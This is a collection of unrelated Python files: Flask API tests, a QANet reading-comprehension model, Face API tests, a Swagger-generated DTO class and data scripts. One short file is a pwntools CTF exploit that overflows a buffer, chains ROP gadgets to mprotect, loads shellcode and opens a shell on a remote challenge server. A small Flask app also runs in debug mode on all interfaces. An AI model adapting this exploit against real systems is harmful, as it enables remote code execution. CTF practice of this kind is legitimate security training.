get_sector_model["name"]
)
assert response.status_code == 200
def test_get_scenarios(client, get_scenario):
"""GET all scenarios"""
response = client.get("/api/v1/scenarios/")
assert current_app.config.data_interface.read_scenarios.called == 1
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == [get_scenario]
def test_get_scenario(client, get_scenario):
"""GET single system-of-systems model"""
name = get_scenario["name"]
response = client.get("/api/v1/scenarios/{}".format(name))
current_app.config.data_interface.read_scenario.assert_called_with(
name, skip_coords=True
)
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == get_scenario
def test_get_scenario_missing(client):
"""GET missing system-of-systems model"""
response = client.get("/api/v1/scenarios/does_not_exist")
data = parse_json(response)
assert data["error"]["SmifDataNotFoundError"] == [
"scenario 'does_not_exist' not found"
]
def test_post_scenario(client, get_scenario):
"""POST system-of-systems model"""
name = "test_post_scenario"
get_scenario["name"] = name
send = serialise_json(get_scenario)
response = client.post(
"/api/v1/scenarios/", data=send, content_type="application/json"
)
current_app.config.data_interface.write_scenario.assert_called_with(get_scenario)
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
def test_delete_scenario(client, get_scenario):
"""DELETE scenario"""
send = serialise_json(get_scenario)
response = client.delete(
"/api/v1/scenarios/" + get_scenario["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.delete_scenario.assert_called_with(
get_scenario["name"]
)
assert response.status_code == 200
def test_put_scenario(client, get_scenario):
"""PUT scenario"""
send = serialise_json(get_scenario)
response = client.put(
"/api/v1/scenarios/" + get_scenario["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.update_scenario.assert_called_with(
get_scenario["name"], get_scenario
)
assert response.status_code == 200
def test_get_dimensions(client, get_dimension):
"""GET all dimensions"""
response = client.get("/api/v1/dimensions/")
assert current_app.config.data_interface.read_dimensions.called == 1
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == [get_dimension]
def test_get_dimension(client, get_dimension):
"""GET single system-of-systems model"""
name = get_dimension["name"]
response = client.get("/api/v1/dimensions/{}".format(name))
current_app.config.data_interface.read_dimension.assert_called_with(
name, skip_coords=True
)
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == get_dimension
def test_get_dimension_missing(client):
"""GET missing system-of-systems model"""
response = client.get("/api/v1/dimensions/does_not_exist")
data = parse_json(response)
assert data["error"]["SmifDataNotFoundError"] == [
"dimension 'does_not_exist' not found"
]
def test_post_dimension(client, get_dimension):
"""POST system-of-systems model"""
name = "test_post_dimension"
get_dimension["name"] = name
send = serialise_json(get_dimension)
response = client.post(
"/api/v1/dimensions/", data=send, content_type="application/json"
)
current_app.config.data_interface.write_dimension.assert_called_with(get_dimension)
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
def test_put_dimension(client, get_dimension):
"""PUT dimension"""
send = serialise_json(get_dimension)
response = client.put(
"/api/v1/dimensions/" + get_dimension["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.update_dimension.assert_called_with(
get_dimension["name"], get_dimension
)
assert response.status_code == 200
def test_delete_dimension(client, get_dimension):
"""DELETE dimension"""
send = serialise_json(get_dimension)
response = client.delete(
"/api/v1/dimensions/" + get_dimension["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.delete_dimension.assert_called_with(
get_dimension["name"]
)
assert response.status_code == 200
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
ipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)
# Solution
def plot_innings_runs_histogram():
runs= ipl_df.pivot_table('runs', aggfunc=np.sum ,index='match_code',columns='inning')
runs.plot.hist(histtype='bar')
plt.show()
|
# Implementation of QANet based on https://github.com/andy840314/QANet-pytorch-
#
# @article{yu2018qanet,
# title={Qanet: Combining local convolution with global self-attention for reading comprehension},
# author={Yu, Adams Wei and Dohan, David and Luong, Minh-Thang and Zhao, Rui and Chen, Kai and Norouzi, Mohammad and Le, Quoc V},
# journal={arXiv preprint arXiv:1804.09541},
# year={2018}
# }
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from dlex.configs import AttrDict
from dlex.torch.models.base import BaseModel
from dlex.torch.utils.ops_utils import maybe_cuda
from dlex.torch.utils.variable_length_tensor import get_mask
from torch.nn.modules.activation import MultiheadAttention
from ..datasets import QABatch, QADataset
def mask_logits(inputs, mask):
mask = mask.type(torch.float32)
return inputs + (-1e30) * (1 - mask)
class InitializedConv1d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=1, relu=False, stride=1, padding=0, groups=1, bias=False):
super().__init__()
self.out = nn.Conv1d(
in_channels, out_channels, kernel_size,
stride=stride, padding=padding, groups=groups, bias=bias)
if relu:
nn.init.kaiming_normal_(self.out.weight, nonlinearity='relu')
else:
nn.init.xavier_uniform_(self.out.weight)
self.relu = relu
def forward(self, x):
return F.relu(self.out(x)) if self.relu else self.out(x)
def PosEncoder(x, min_timescale=1.0, max_timescale=1.0e4):
x = x.transpose(1, 2)
length = x.size()[1]
channels = x.size()[2]
signal = get_timing_signal(length, channels, min_timescale, max_timescale)
return (x + maybe_cuda(signal)).transpose(1, 2)
def get_timing_signal(length, channels, min_timescale=1.0, max_timescale=1.0e4):
position = torch.arange(length).type(torch.float32)
num_timescales = channels // 2
log_timescale_increment = (math.log(float(max_timescale) / float(min_timescale)) / (float(num_timescales) - 1))
inv_timescales = min_timescale * torch.exp(
torch.arange(num_timescales).type(torch.float32) * -log_timescale_increment)
scaled_time = position.unsqueeze(1) * inv_timescales.unsqueeze(0)
signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], dim=1)
m = nn.ZeroPad2d((0, (channels % 2), 0, 0))
signal = m(signal)
signal = signal.view(1, length, channels)
return signal
class DepthwiseSeparableConv(nn.Module):
def __init__(self, in_ch, out_ch, k, bias=True):
super().__init__()
self.depthwise_conv = nn.Conv1d(
in_channels=in_ch, out_channels=in_ch, kernel_size=k, groups=in_ch,
padding=k // 2, bias=False)
self.pointwise_conv = nn.Conv1d(
in_channels=in_ch, out_channels=out_ch, kernel_size=1, padding=0, bias=bias)
def forward(self, x):
return F.relu(self.pointwise_conv(self.depthwise_conv(x)))
class Highway(nn.Module):
def __init__(self, layer_num: int, size, dropout):
super().__init__()
self.n = layer_num
self.linear = nn.ModuleList([InitializedConv1d(size, size, relu=False, bias=True) for _ in range(self.n)])
self.gate = nn.ModuleList([InitializedConv1d(size, size, bias=True) for _ in range(self.n)])
self.dropout = nn.Dropout(dropout)
def forward(self, x):
for i in range(self.n):
gate = torch.sigmoid(self.gate[i](x))
nonlinear = self.linear[i](x)
nonlinear = self.dropout(nonlinear)
x = gate * nonlinear + (1 - gate) * x
return x
class SelfAttention(nn.Module):
def __init__(self, connector_dim, num_heads, dropout):
super().__init__()
self.num_heads = num_heads
self.attn = MultiheadAttention(
embed_dim=connector_dim,
num_heads=num_heads,
dropout=dropout)
def forward(self, query, mask):
query = query.permute(2, 0, 1)
X, _ = self.attn(query, query, query, key_padding_mask=mask)
return X.permute(1, 2, 0)
class Embedding(nn.Module):
def __init__(self, connector_dim, word_dim, char_dim, dropout, dropout_char):
super().__init__()
self.conv2d = nn.Conv2d(char_dim, connector_dim, kernel_size=(1, 7), padding=0, bias=True)
nn.init.kaiming_normal_(self.conv2d.weight, nonlinearity='relu')
self.conv1d = InitializedConv1d(word_dim + connector_dim, connector_dim, bias=False)
self.high = Highway(2, connector_dim, dropout)
self.dropout_word = nn.Dropout(dropout)
self.dropout_char = nn.Dropout(dropout_char)
def forward(self, char_emb, word_emb, length):
char_emb = char_emb.permute(0, 3, 1, 2)
char_emb = self.dropout_char(char_emb)
char_emb = self.conv2d(char_emb)
char_emb = F.relu(char_emb)
char_emb, _ = torch.max(char_emb, dim=3)
char_emb = char_emb.squeeze()
word_emb = self.dropout_word(word_emb)
word_emb = word_emb.transpose(1, 2)
emb = torch.cat([char_emb, word_emb], dim=1)
emb = self.conv1d(emb)
emb = self.high(emb)
return emb
class EncoderBlock(nn.Module):
def __init__(
self,
conv_num_layers: int,
conv_num_filters: int,
kernel_size: int,
connector_dim: int,
num_heads: int,
dropout):
super().__init__()
self.convs = nn.ModuleList([DepthwiseSeparableConv(
conv_num_filters, conv_num_filters, kernel_size
) for _ in range(conv_num_layers)])
self.self_att = SelfAttention(connector_dim, num_heads, dropout)
self.FFN_1 = InitializedConv1d(conv_num_filters, conv_num_filters, relu=True, bias=True)
self.FFN_2 = InitializedConv1d(conv_num_filters, conv_num_filters, bias=True)
self.norm_C = nn.ModuleList([nn.LayerNorm(connector_dim) for _ in range(conv_num_layers)])
self.norm_1 = nn.LayerNorm(connector_dim)
self.norm_2 = nn.LayerNorm(connector_dim)
self.conv_num_layers = conv_num_layers
self.dropout_p = dropout
self.dropout = nn.Dropout(dropout)
def forward(self, x, mask, l, num_blocks):
total_layers = (self.conv_num_layers + 1) * num_blocks
out = PosEncoder(x)
for i, conv in enumerate(self.convs):
res = out
out = self.norm_C[i](out.transpose(1, 2)).transpose(1, 2)
if i % 2 == 0:
out = self.dropout(out)
out = conv(out)
out = self.layer_dropout(out, res, self.dropout_p * float(l) / total_layers)
l += 1
res = out
out = self.norm_1(out.transpose(1, 2)).transpose(1, 2)
out = self.dropout(out)
out = self.self_att(out, mask)
out = self.layer_dropout(out, res, self.dropout_p * float(l) / total_layers)
l += 1
res = out
out = self.norm_2(out.transpose(1, 2)).transpose(1, 2)
out = self.dropout(out)
out = self.FFN_1(out)
out = self.FFN_2(out)
out = self.layer_dropout(out, res, self.dropout_p * float(l) / total_layers)
return out
def layer_dropout(self, inputs, residual, dropout):
if self.training:
pred = torch.empty(1).uniform_(0, 1) < dropout
if pred:
return residual
else:
return self.dropout(inputs) + residual
else:
return inputs + residual
class ContextQueryAttention(nn.Module):
def __init__(self, connector_dim, dropout):
super().__init__()
wC = torch.empty(connector_dim, 1)
wQ = torch.empty(connector_dim, 1)
wQC = torch.empty(1, 1, connector_dim)
bias = torch.empty(1)
nn.init.xavier_uniform_(wC)
nn.init.xavier_uniform_(wQ)
nn.init.xavier_uniform_(wQC)
nn.init.constant_(bias, 0)
self.wC = nn.Parameter(wC)
self.wQ = nn.Parameter(wQ)
self.wQC = nn.Parameter(wQC)
self.bias = nn.Parameter(bias)
self.dropout = nn.Dropout(dropout)
def forward(self, C, Q, maskC, maskQ):
C = C.transpose(1, 2) # B * context_max_length * emb_dim
Q = Q.transpose(1, 2)
batch_size = C.shape[0]
S = self.trilinear(C, Q)
maskC = maskC.view(batch_size, C.shape[1], 1)
maskQ = maskQ.view(batch_size, 1, Q.shape[1])
# context-to-query attention
S1 = F.softmax(mask_logits(S, maskQ), dim=2)
A = torch.bmm(S1, Q)
# query-to-context attention
S2 = F.softmax(mask_logits(S, maskC), dim=1)
B = torch.bmm(torch.bmm(S1, S2.transpose(1, 2)), C)
out = torch.cat([C, A, torch.mul(C, A), torch.mul(C, B)], dim=2)
return out.transpose(1, 2)
def trilinear(self, C, Q):
"""
Trilinear function (Seo et. al, 2016)
:param C:
:param Q:
:return: similarities between each pair of context and query words
$f(q, c) = W_0 [q, c, q \odot c]$
"""
C = self.dropout(C)
Q = self.dropout(Q)
res = torch.matmul(C, self.wC).expand([-1, -1, Q.shape[1]]) + \
torch.matmul(Q, self.wQ).transpose(1, 2).expand([-1, C.shape[1], -1]) + \
torch.matmul(C * self.wQC, Q.transpose(1, 2)) + \
self.bias
return res
class Pointer(nn.Module):
def __init__(self, dim):
super().__init__()
self.w1 = InitializedConv1d(dim * 2, 1)
self.w2 = InitializedConv1d(dim * 2, 1)
def forward(self, M1, M2, M3, mask):
X1 = torch.cat([M1, M2], dim=1)
X2 = torch.cat([M1, M3], dim=1)
Y1 = mask_logits(self.w1(X1).squeeze(), mask)
Y2 = mask_logits(self.w2(X2).squeeze(), mask)
return Y1, Y2
class QANet(BaseModel):
def __init__(self, params: AttrDict, dataset: QADataset):
super().__init__(params, dataset)
cfg = self.configs
# input embedding layer
self.emb_word = dataset.word_embedding_layer
self.emb_char = nn.Embedding(len(dataset.vocab_char), cfg.input_embedding.char_dim)
self.emb = Embedding(cfg.connector_dim, dataset.word_dim, dataset.char_dim, cfg.dropout, cfg.dropout_char)
# embedding encoder layer
self.emb_enc = EncoderBlock(
conv_num_layers=cfg.embedding_encoder.conv_num_layers,
conv_num_filters=cfg.connector_dim,
kernel_size=cfg.embedding_encoder.conv_kernel_size,
connector_dim=cfg.connector_dim,
num_heads=cfg.embedding_encoder.num_heads or cfg.num_heads,
dropout=cfg.dropout)
# context-query attention layer
self.cq_att = ContextQueryAttention(
connector_dim=cfg.connector_dim,
dropout=cfg.dropout)
self.cq_resizer = InitializedConv1d(cfg.connector_dim * 4, cfg.connector_dim)
# model encoder layer
self.encoder_blocks = nn.ModuleList([
EncoderBlock(
conv_num_layers=cfg.model_encoder.conv_num_layers,
conv_num_filters=cfg.connector_dim,
kernel_size=cfg.model_encoder.conv_kernel_size,
connector_dim=cfg.connector_dim,
num_heads=cfg.model_encoder.num_heads or cfg.num_heads,
dropout=cfg.dropout
) for _ in range(cfg.model_encoder.num_blocks)])
# output layer
self.out = Pointer(cfg.connector_dim)
self.dropout = nn.Dropout(cfg.dropout)
def forward(self, batch):
cfg = self.params.model
context_word, context_word_lengths, context_char, question_word, question_word_lengths, question_char = batch.X
# input embedding layer
maskC = get_mask(context_word_lengths)
maskQ = get_mask(question_word_lengths)
Cw = self.emb_word(context_word)
Cc = self.emb_char(context_char)
Qw = self.emb_word(question_word)
Qc = self.emb_char(question_char)
C = self.emb(Cc, Cw, Cw.shape[1])
Q = self.emb(Qc, Qw, Qw.shape[1])
# embedding encoder layer
Ce = self.emb_enc(C, ~maskC, 1, 1)
Qe = self.emb_enc(Q, ~maskQ, 1, 1)
# context-query attention layer
X = self.cq_att(Ce, Qe, maskC.float(), maskQ.float())
M = self.cq_resizer(X)
M = F.dropout(M, p=cfg.dropout, training=self.training)
# model encoder layer
for i, block in enumerate(self.encoder_blocks):
M = block(M, ~maskC, i * (2 + 2) + 1, cfg.model_encoder.num_blocks)
M0 = M
M = self.dropout(M)
for i, block in enumerate(self.encoder_blocks):
M = block(M, ~maskC, i * (2 + 2) + 1, cfg.model_encoder.num_blocks)
M1 = M
M = self.dropout(M)
for i, block in enumerate(self.encoder_blocks):
M = block(M, ~maskC, i * (2 + 2) + 1, cfg.model_encoder.num_blocks)
M2 = M
# output layer
p1, p2 = self.out(M0, M1, M2, maskC.float())
return p1, p2
def get_loss(self, batch: QABatch, output):
p1, p2 = output
y1, y2 = batch.Y[:, 0], batch.Y[:, 1]
return F.cross_entropy(p1, y1) + F.cross_entropy(p2, y2)
def infer(self, batch: QABatch):
p1, p2 = self.forward(batch)
p1 = torch.argmax(p1, -1).tolist()
p2 = torch.argmax(p2, -1).tolist()
y1, y2 = batch.Y[:, 0].tolist(), batch.Y[:, 1].tolist()
pred = list(map(list, zip(*[p1, p2])))
ref = list(map(list, zip(*[y1, y2])))
return pred, ref, None, None
|
import unittest
from CONSTANTS import FACE_API_KEY, FACE_BASE_URL
from face.FaceAPIWrapper import FaceAPIWrapper
class TestFaceAPIWrapper(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TestFaceAPIWrapper, cls).setUpClass()
key = FACE_API_KEY
base_url = FACE_BASE_URL
image_urls = ['images/Peter_Hook/train/1.jpg',
'images/Peter_Hook/train/2.jpg',
'images/Peter_Hook/train/3.jpg',
'images/Peter_Hook/train/4.jpg',
'images/Peter_Hook/train/5.jpg',
'images/Peter_Hook/train/6.jpg',
'images/Peter_Hook/train/7.jpg',
'images/Peter_Hook/train/8.jpg',
'images/Peter_Hook/train/9.jpg',
'images/Peter_Hook/train/10.jpg',
]
cls.person_group = 'bassist'
cls.person_name = 'Peter Hook'
cls.face_api = FaceAPIWrapper(key, base_url)
cls.face_api.delete_group(cls.person_group)
cls.face_api.create_group(cls.person_group)
cls.person_id = cls.face_api.create_person(person_group=cls.person_group, person_name=cls.person_name)
for image_url in image_urls:
cls.face_api.add_faces_to_person(person_group=cls.person_group, person_id=cls.person_id,
image_url=image_url)
cls.face_api.train_group(cls.person_group)
def test_correct_identification_same_persons(self):
test_image = 'images/Peter_hook/test/11.jpg'
face_ids = self.face_api.detect_faces(image=test_image)
identified_person_id = \
self.face_api.identify_faces(face_ids=face_ids,
large_person_group=self.person_group) or " "
self.assertEqual(identified_person_id, self.person_id)
def test_correct_identification_different_persons(self):
test_image_2 = 'images/detection1.jpg'
face_ids = self.face_api.detect_faces(image=test_image_2)
identified_person_id = \
self.face_api.identify_faces(face_ids=face_ids,
large_person_group=self.person_group) or " "
self.assertNotEqual(identified_person_id, self.person_id)
def test_create_group(self):
self.face_api.delete_group("random_test_group")
self.face_api.create_group("random_test_group")
groups = self.face_api.list_groups()
# Format [{'largePersonGroupId': 'allowed_persons', 'name': 'allowed_persons', 'userData': None},]
found = False
for group in groups:
found = 'random_test_group' in group['largePersonGroupId'] or 'random_test_group' in group['name']
if found:
break
self.assertTrue(found)
self.face_api.delete_group("random_test_group")
def test_delete_group(self):
self.face_api.create_group("random_test_group")
self.face_api.delete_group("random_test_group")
groups = self.face_api.list_groups()
# Format [{'largePersonGroupId': 'allowed_persons', 'name': 'allowed_persons', 'userData': None},]
found = False
for group in groups:
found = 'random_test_group' in group['largePersonGroupId'] or 'random_test_group' in group['name']
if found:
break
self.assertFalse(found)
def tearDown(self):
# Basic rate limiting
import time
time.sleep(30)
@classmethod
def tearDownClass(cls):
super(TestFaceAPIWrapper, cls).tearDownClass()
cls.face_api.delete_group(cls.person_group)
if __name__ == '__main__':
unittest.main()
|
from flask import Flask
import os
PORT = 8080
name = os.environ['NAME']
if name == None or len(name) == 0:
name = "world"
MESSAGE = "Good morning, " + name + "!"
print("Message: '" + MESSAGE + "'")
app = Flask(__name__)
@app.route("/")
def root():
print("Handling web request. Returning message.")
result = MESSAGE.encode("utf-8")
return result
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=PORT)
|
import graphlab
import pickle
from graphlab import aggregate as agg
import itertools
authors=graphlab.SFrame('./170331_PURE_Data_Challenge/PURE Data Challenge/authors.csv')
pub_authors = authors.groupby(key_columns='PERSON_ID', operations={'publications':agg.CONCAT('PUBLICATION_ID')})
solo_count = 0
links = dict()
for ci,pub in enumerate(pub_authors):
if len(pub['publications'])==1:
solo_count += 1
else:
_links = itertools.combinations(pub['publications'],2)
for l in _links:
if l not in links.keys():
links[l] = 1
else:
links[l] +=1
if ci%100==0:
print ci
print "Established %d links in the publication network." %len(links)
print "%d authors publish only a single paper." %solo_count
f = open('publication_net_links_dict.pkl', 'wb')
pickle.dump(file=f,obj=links)
f.close()
|
# coding: utf-8
"""
SevOne API Documentation
Supported endpoints by the new RESTful API # noqa: E501
OpenAPI spec version: 2.1.18, Hash: db562e6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class IndicatorRequestDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'int',
'evaluation_order': 'int',
'format': 'str',
'is_baselining': 'bool',
'last_invalidation_time': 'int',
'max_value': 'float',
'plugin_indicator_type_id': 'int',
'synthetic_expression': 'str',
'system_max_value': 'float',
'extended_info': 'dict(str, str)',
'is_deleted': 'bool',
'is_enabled': 'bool'
}
attribute_map = {
'id': 'id',
'evaluation_order': 'evaluationOrder',
'format': 'format',
'is_baselining': 'isBaselining',
'last_invalidation_time': 'lastInvalidationTime',
'max_value': 'maxValue',
'plugin_indicator_type_id': 'pluginIndicatorTypeId',
'synthetic_expression': 'syntheticExpression',
'system_max_value': 'systemMaxValue',
'extended_info': 'extendedInfo',
'is_deleted': 'isDeleted',
'is_enabled': 'isEnabled'
}
def __init__(self, id=None, evaluation_order=None, format=None, is_baselining=None, last_invalidation_time=None, max_value=None, plugin_indicator_type_id=None, synthetic_expression=None, system_max_value=None, extended_info=None, is_deleted=None, is_enabled=None): # noqa: E501
"""IndicatorRequestDto - a model defined in Swagger""" # noqa: E501
self._id = None
self._evaluation_order = None
self._format = None
self._is_baselining = None
self._last_invalidation_time = None
self._max_value = None
self._plugin_indicator_type_id = None
self._synthetic_expression = None
self._system_max_value = None
self._extended_info = None
self._is_deleted = None
self._is_enabled = None
self.discriminator = None
if id is not None:
self.id = id
if evaluation_order is not None:
self.evaluation_order = evaluation_order
if format is not None:
self.format = format
if is_baselining is not None:
self.is_baselining = is_baselining
if last_invalidation_time is not None:
self.last_invalidation_time = last_invalidation_time
if max_value is not None:
self.max_value = max_value
if plugin_indicator_type_id is not None:
self.plugin_indicator_type_id = plugin_indicator_type_id
if synthetic_expression is not None:
self.synthetic_expression = synthetic_expression
if system_max_value is not None:
self.system_max_value = system_max_value
if extended_info is not None:
self.extended_info = extended_info
if is_deleted is not None:
self.is_deleted = is_deleted
if is_enabled is not None:
self.is_enabled = is_enabled
@property
def id(self):
"""Gets the id of this IndicatorRequestDto. # noqa: E501
:return: The id of this IndicatorRequestDto. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this IndicatorRequestDto.
:param id: The id of this IndicatorRequestDto. # noqa: E501
:type: int
"""
self._id = id
@property
def evaluation_order(self):
"""Gets the evaluation_order of this IndicatorRequestDto. # noqa: E501
:return: The evaluation_order of this IndicatorRequestDto. # noqa: E501
:rtype: int
"""
return self._evaluation_order
@evaluation_order.setter
def evaluation_order(self, evaluation_order):
"""Sets the evaluation_order of this IndicatorRequestDto.
:param evaluation_order: The evaluation_order of this IndicatorRequestDto. # noqa: E501
:type: int
"""
self._evaluation_order = evaluation_order
@property
def format(self):
"""Gets the format of this IndicatorRequestDto. # noqa: E501
:return: The format of this IndicatorRequestDto. # noqa: E501
:rtype: str
"""
return self._format
@format.setter
def format(self, format):
"""Sets the format of this IndicatorRequestDto.
:param format: The format of this IndicatorRequestDto. # noqa: E501
:type: str
"""
allowed_values = ["GAUGE", "COUNTER32", "COUNTER64"] # noqa: E501
if format not in allowed_values:
raise ValueError(
"Invalid value for `format` ({0}), must be one of {1}" # noqa: E501
.format(format, allowed_values)
)
self._format = format
@property
def is_baselining(self):
"""Gets the is_baselining of this IndicatorRequestDto. # noqa: E501
:return: The is_baselining of this IndicatorRequestDto. # noqa: E501
:rtype: bool
"""
return self._is_baselining
@is_baselining.setter
def is_baselining(self, is_baselining):
"""Sets the is_baselining of this IndicatorRequestDto.
:param is_baselining: The is_baselining of this IndicatorRequestDto. # noqa: E501
:type: bool
"""
self._is_baselining = is_baselining
@property
def last_invalidation_time(self):
"""Gets the last_invalidation_time of this IndicatorRequestDto. # noqa: E501
Unix timestamp with milliseconds proximity # noqa: E501
:return: The last_invalidation_time of this IndicatorRequestDto. # noqa: E501
:rtype: int
"""
return self._last_invalidation_time
@last_invalidation_time.setter
def last_invalidation_time(self, last_invalidation_time):
"""Sets the last_invalidation_time of this IndicatorRequestDto.
Unix timestamp with milliseconds proximity # noqa: E501
:param last_invalidation_time: The last_invalidation_time of this IndicatorRequestDto. # noqa: E501
:type: int
"""
self._last_invalidation_time = last_invalidation_time
@property
def max_value(self):
"""Gets the max_value of this IndicatorRequestDto. # noqa: E501
:return: The max_value of this IndicatorRequestDto. # noqa: E501
:rtype: float
"""
return self._max_value
@max_value.setter
def max_value(self, max_value):
"""Sets the max_value of this IndicatorRequestDto.
:param max_value: The max_value of this IndicatorRequestDto. # noqa: E501
:type: float
"""
self._max_value = max_value
@property
def plugin_indicator_type_id(self):
"""Gets the plugin_indicator_type_id of this IndicatorRequestDto. # noqa: E501
:return: The plugin_indicator_type_id of this IndicatorRequestDto. # noqa: E501
:rtype: int
"""
return self._plugin_indicator_type_id
@plugin_indicator_type_id.setter
def plugin_indicator_type_id(self, plugin_indicator_type_id):
"""Sets the plugin_indicator_type_id of this IndicatorRequestDto.
:param plugin_indicator_type_id: The plugin_indicator_type_id of this IndicatorRequestDto. # noqa: E501
:type: int
"""
self._plugin_indicator_type_id = plugin_indicator_type_id
@property
def synthetic_expression(self):
"""Gets the synthetic_expression of this IndicatorRequestDto. # noqa: E501
:return: The synthetic_expression of this IndicatorRequestDto. # noqa: E501
:rtype: str
"""
return self._synthetic_expression
@synthetic_expression.setter
def synthetic_expression(self, synthetic_expression):
"""Sets the synthetic_expression of this IndicatorRequestDto.
:param synthetic_expression: The synthetic_expression of this IndicatorRequestDto. # noqa: E501
:type: str
"""
self._synthetic_expression = synthetic_expression
@property
def system_max_value(self):
"""Gets the system_max_value of this IndicatorRequestDto. # noqa: E501
:return: The system_max_value of this IndicatorRequestDto. # noqa: E501
:rtype: float
"""
return self._system_max_value
@system_max_value.setter
def system_max_value(self, system_max_value):
"""Sets the system_max_value of this IndicatorRequestDto.
:param system_max_value: The system_max_value of this IndicatorRequestDto. # noqa: E501
:type: float
"""
self._system_max_value = system_max_value
@property
def extended_info(self):
"""Gets the extended_info of this IndicatorRequestDto. # noqa: E501
:return: The extended_info of this IndicatorRequestDto. # noqa: E501
:rtype: dict(str, str)
"""
return self._extended_info
@extended_info.setter
def extended_info(self, extended_info):
"""Sets the extended_info of this IndicatorRequestDto.
:param extended_info: The extended_info of this IndicatorRequestDto. # noqa: E501
:type: dict(str, str)
"""
self._extended_info = extended_info
@property
def is_deleted(self):
"""Gets the is_deleted of this IndicatorRequestDto. # noqa: E501
false # noqa: E501
:return: The is_deleted of this IndicatorRequestDto. # noqa: E501
:rtype: bool
"""
return self._is_deleted
@is_deleted.setter
def is_deleted(self, is_deleted):
"""Sets the is_deleted of this IndicatorRequestDto.
false # noqa: E501
:param is_deleted: The is_deleted of this IndicatorRequestDto. # noqa: E501
:type: bool
"""
self._is_deleted = is_deleted
@property
def is_enabled(self):
"""Gets the is_enabled of this IndicatorRequestDto. # noqa: E501
:return: The is_enabled of this IndicatorRequestDto. # noqa: E501
:rtype: bool
"""
return self._is_enabled
@is_enabled.setter
def is_enabled(self, is_enabled):
"""Sets the is_enabled of this IndicatorRequestDto.
:param is_enabled: The is_enabled of this IndicatorRequestDto. # noqa: E501
:type: bool
"""
self._is_enabled = is_enabled
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(IndicatorRequestDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, IndicatorRequestDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from pwn import *
pop_3_ret_addr = 0x0809e3e5
pop_2_ret_addr = 0x0809a6fc
pop_1_ret_addr = 0x080481ad
bss_addr = 0x080EC000
bss_len = 0x2000
#p = process('./not_the_same_3dsctf_2016')
p = remote('node3.buuoj.cn', 28377)
elf = ELF('not_the_same_3dsctf_2016')
mprotect_addr = elf.symbols['mprotect']
port = 1 + 2 + 4
gets_addr = elf.symbols['gets']
shellcode = asm(shellcraft.sh(), os = 'linux', arch = 'i386')
payload = b'a' * 0x2d + p32(mprotect_addr) + p32(pop_3_ret_addr) + p32(bss_addr) + p32(bss_len) + p32(port)
payload += p32(gets_addr) + p32(pop_1_ret_addr) + p32(bss_addr) + p32(bss_addr)
p.sendline(payload)
p.sendline(shellcode)
p.interactive()
|
import copy
import dataclasses
import pytest
import time
import typing as tp
from pytest import approx
from compgraph import operations as ops
from . import memory_watchdog
KiB = 1024
MiB = 1024 * KiB
class _Key:
def __init__(self, *args: str) -> None:
self._items = sorted(args)
def __call__(self, d: tp.Mapping[str, tp.Any]) -> tp.Tuple[str, ...]:
return tuple(str(d.get(key)) for key in self._items)
@dataclasses.dataclass
class MapCase:
mapper: ops.Mapper
data: tp.List[ops.TRow]
etalon: tp.List[ops.TRow]
cmp_keys: tp.Tuple[str, ...]
mapper_item: int = 0
mapper_etalon_items: tp.Tuple[int, ...] = (0,)
MAP_CASES = [
MapCase(
mapper=ops.DummyMapper(),
data=[
{'test_id': 1, 'text': 'one two three'},
{'test_id': 2, 'text': 'testing out stuff'}
],
etalon=[
{'test_id': 1, 'text': 'one two three'},
{'test_id': 2, 'text': 'testing out stuff'}
],
cmp_keys=("test_id", "text")
),
MapCase(
mapper=ops.LowerCase(column='text'),
data=[
{'test_id': 1, 'text': 'camelCaseTest'},
{'test_id': 2, 'text': 'UPPER_CASE_TEST'},
{'test_id': 3, 'text': 'wEiRdTeSt'}
],
etalon=[
{'test_id': 1, 'text': 'camelcasetest'},
{'test_id': 2, 'text': 'upper_case_test'},
{'test_id': 3, 'text': 'weirdtest'}
],
cmp_keys=("test_id", "text")
),
MapCase(
mapper=ops.FilterPunctuation(column='text'),
data=[
{'test_id': 1, 'text': 'Hello, world!'},
{'test_id': 2, 'text': 'Test. with. a. lot. of. dots.'},
{'test_id': 3, 'text': r'!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'}
],
etalon=[
{'test_id': 1, 'text': 'Hello world'},
{'test_id': 2, 'text': 'Test with a lot of dots'},
{'test_id': 3, 'text': ''}
],
cmp_keys=("test_id", "text")
),
MapCase(
mapper=ops.Split(column='text'),
data=[
{'test_id': 1, 'text': 'one two three'},
